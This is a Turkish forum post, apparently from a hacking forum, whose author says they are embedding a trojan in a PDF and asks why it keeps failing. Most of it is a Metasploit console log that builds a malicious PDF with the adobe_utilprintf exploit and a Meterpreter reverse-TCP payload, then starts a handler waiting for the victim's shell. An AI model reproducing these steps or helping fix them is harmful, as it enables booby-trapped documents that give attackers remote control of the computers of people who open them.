merhaba bugün pdf içine trojen yedirirken böyle bir sorunla karşılaştım daha önceden böyle bir sorunla karşılaşmamıştım son zamanlarda sürekli karşılaşıyorum sebebi ve çözümü nedir bilen varsa yardımcı olabilir mi?
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
merhaba bugün pdf içine trojen yedirirken böyle bir sorunla karşılaştım daha önceden böyle bir sorunla karşılaşmamıştım son zamanlarda sürekli karşılaşıyorum sebebi ve çözümü nedir bilen varsa yardımcı olabilir mi?
pc@desktop:~$ msfconsole -qThis copy of metasploit-framework is more than two weeks old.msf6 > use exploit/windows/fileformat/adobe_utilprintf # modülü seçiyorum [*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/fileformat/adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf6 exploit(windows/fileformat/adobe_utilprintf) > set LHOST Interrupt: use the 'exit' command to quitmsf6 exploit(windows/fileformat/adobe_utilprintf) > hostname -I[*] exec: hostname -I192.168.1.108 203:dbd0:33d2:eaf8:785f:563a:cdb5:f328 msf6 exploit(windows/fileformat/adobe_utilprintf) > set LHOST 192.168.1.108 LHOST => 192.168.1.108msf6 exploit(windows/fileformat/adobe_utilprintf) > set LPORT 7777LPORT => 7777msf6 exploit(windows/fileformat/adobe_utilprintf) > set FILENAME ff00ff.pdfFILENAME => ff00ff.pdfmsf6 exploit(windows/fileformat/adobe_utilprintf) > run[*] Creating 'ff00ff.pdf' file...[+] ff00ff.pdf stored at /home/pc/snap/metasploit-framework/common/.msf4/local/ff00ff.pdfmsf6 exploit(windows/fileformat/adobe_utilprintf) > cp -r /home/pc/snap/metasploit-framework/common/.msf4/local/ff00ff.pdf /home/pc/Desktop[*] exec: cp -r /home/pc/snap/metasploit-framework/common/.msf4/local/ff00ff.pdf /home/pc/Desktopmsf6 exploit(windows/fileformat/adobe_utilprintf) > file /home/pc/Desktop/ff00ff.pdf[-] Unknown command: file. Run the help command for more details.msf6 exploit(windows/fileformat/adobe_utilprintf) > ls -l /home/pc/Desktop/ff00ff.pdf[*] exec: ls -l /home/pc/Desktop/ff00ff.pdf-rw-rw-r-- 1 pc pc 7107 May 28 21:47 /home/pc/Desktop/ff00ff.pdfmsf6 exploit(windows/fileformat/adobe_utilprintf) > [*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 192.168.1.108LHOST => 192.168.1.108msf6 exploit(multi/handler) > set LPORT 7777LPORT => 7777msf6 exploit(multi/handler) > run # SESSİON DÜŞÜNCE BURDAN TAKİP EDECEKSİN[*] Started reverse TCP handler on 192.168.1.108:7777